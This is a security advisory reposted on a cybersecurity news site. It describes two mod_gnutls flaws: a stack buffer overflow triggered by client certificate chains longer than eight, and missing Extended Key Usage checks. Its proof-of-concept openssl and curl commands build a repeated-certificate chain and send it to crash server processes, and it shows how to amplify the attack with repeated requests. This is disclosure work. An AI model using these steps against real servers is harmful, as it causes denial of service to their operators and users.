Close Menu

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Microsoft July 2026 Patch Tuesday fixes massive 570 flaws, 3 zero-days

    July 14, 2026

    Microsoft releases Windows 10 KB5099539 extended security update

    July 14, 2026

    Enterprise Asset Management Policy Template for the CIS Controls v8.1 (French)

    July 14, 2026
    Facebook X (Twitter) Instagram
    • Demos
    • Technology
    • Gaming
    • Buy Now
    Facebook X (Twitter) Instagram Pinterest Vimeo
    Canadian Cyber WatchCanadian Cyber Watch
    • Home
    • News
    • Alerts
    • Tips
    • Tools
    • Industry
    • Incidents
    • Events
    • Education
    Subscribe
    Canadian Cyber WatchCanadian Cyber Watch
    Home»Alerts»mod_gnutls Multiple Vulnerabilities – Research Advisory
    Alerts

    mod_gnutls Multiple Vulnerabilities – Research Advisory

    adminBy adminMarch 20, 2026No Comments2 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email


    Multiple vulnerabilities exist in mod_gnutls.

     

    CVE-2026-33307 Stack-based Buffer Overflow in Client Certificate Chain Processing 

    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5)

    A client certificate chain with more than 8 certificates can cause a stack-based buffer overflow. The certificate chain does not need to lead to a trusted root, or even be a well-formed chain – the same certificate can be used multiple times.

     

    Proof of Concept: 

     

    The following steps demonstrate the vulnerability on a Fedora 42 system running mod_gnutls 0.12.0.

     

    1. The attacker generates a self-signed certificate:

    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365 -noenc -subj “/CN=self-signed-cert”

     

    Please note there are no particular requirements for the contents of this certificate.

     

    2. The attacker generates a malicious certificate chain by using 9 copies of the same certificate generated above:

    cat cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem > malicious-cert-chain.pem

     

    3. The attacker initiates an mTLS connection using the crafted certificate chain: 

    curl https:// -k –key key.pem –cert malicious-cert-chain.pem

     

    4. The following entry can be found in the /var/log/httpd/error_log file on the server:

    *** stack smashing detected ***: terminated

    […] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3449 exit signal Abort (6), possible coredump in /etc/httpd

     

    The above confirms that the stack-based buffer overflow was detected and the protections kicked in: the process was aborted, and a core dump was generated. This largely reduces this vulnerability to a transient DoS, thanks to the hardening.

     

    This attack can be easily amplified by the attacker by making a number of requests:

    curl https:// https:// https:// https:// -k –key key.pem –cert malicious-cert-chain.pem

     

    This vulnerability can lead to a potential DoS through attacker-controlled CPU, memory and disk usage, despite the protections in place.

     

    CVE-2026-33308 Improper Certificate Validation

    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N (6.8)

    A client certificate with incorrect Extended Key Usage (EKU) is accepted. If the attackers compromise a certificate (with the associated private key) issued for a different purpose (e.g. server authentication), they may be able to reuse it for mTLS client authentication.

     

    Proof of Concept:

    The attacker makes a HTTPS request using a separately acquired private key and certificate chain:

    curl https:// -k –key key.pem –cert not-client-cert-chain.pem



    Source link

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleNZ Incident: Kiwi car dealership Tristram European listed by DragonForce ransomware | Cyberdaily.au
    Next Article ZPHP Campaign Delivering Remcos RAT Impacting SLTTs
    admin
    • Website

    Related Posts

    Alerts

    CISA Adds One Known Exploited Vulnerability to Catalog

    June 12, 2026
    Alerts

    FreePBX security advisory (AV26–596) – Canadian Centre for Cyber Security

    June 12, 2026
    Alerts

    SSA-879734 V1.0: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1

    June 12, 2026
    Add A Comment

    Comments are closed.

    Demo
    Top Posts

    Catchy & Intriguing

    March 17, 202677 Views

    The Canadian Password Playbook: Navigating Compliance and Building Strong Passwords

    March 25, 202634 Views

    IP Address Investigations and Local OSINT

    March 20, 202634 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest Reviews
    85
    Featured

    Pico 4 Review: Should You Actually Buy One Instead Of Quest 2?

    January 15, 2021 Featured
    8.1
    Uncategorized

    A Review of the Venus Optics Argus 18mm f/0.95 MFT APO Lens

    January 15, 2021 Uncategorized
    8.9
    Editor's Picks

    DJI Avata Review: Immersive FPV Flying For Drone Enthusiasts

    January 15, 2021 Editor's Picks

    Subscribe to Updates

    Get the latest tech news from FooBar about tech, design and biz.

    Demo
    Most Popular

    Catchy & Intriguing

    March 17, 202677 Views

    The Canadian Password Playbook: Navigating Compliance and Building Strong Passwords

    March 25, 202634 Views

    IP Address Investigations and Local OSINT

    March 20, 202634 Views
    Our Picks

    Microsoft July 2026 Patch Tuesday fixes massive 570 flaws, 3 zero-days

    July 14, 2026

    Microsoft releases Windows 10 KB5099539 extended security update

    July 14, 2026

    Enterprise Asset Management Policy Template for the CIS Controls v8.1 (French)

    July 14, 2026

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    Facebook X (Twitter) Instagram Pinterest
    • Home
    • Technology
    • Gaming
    • Phones
    • Buy Now
    © 2026 ThemeSphere. Designed by ThemeSphere.

    Type above and press Enter to search. Press Esc to cancel.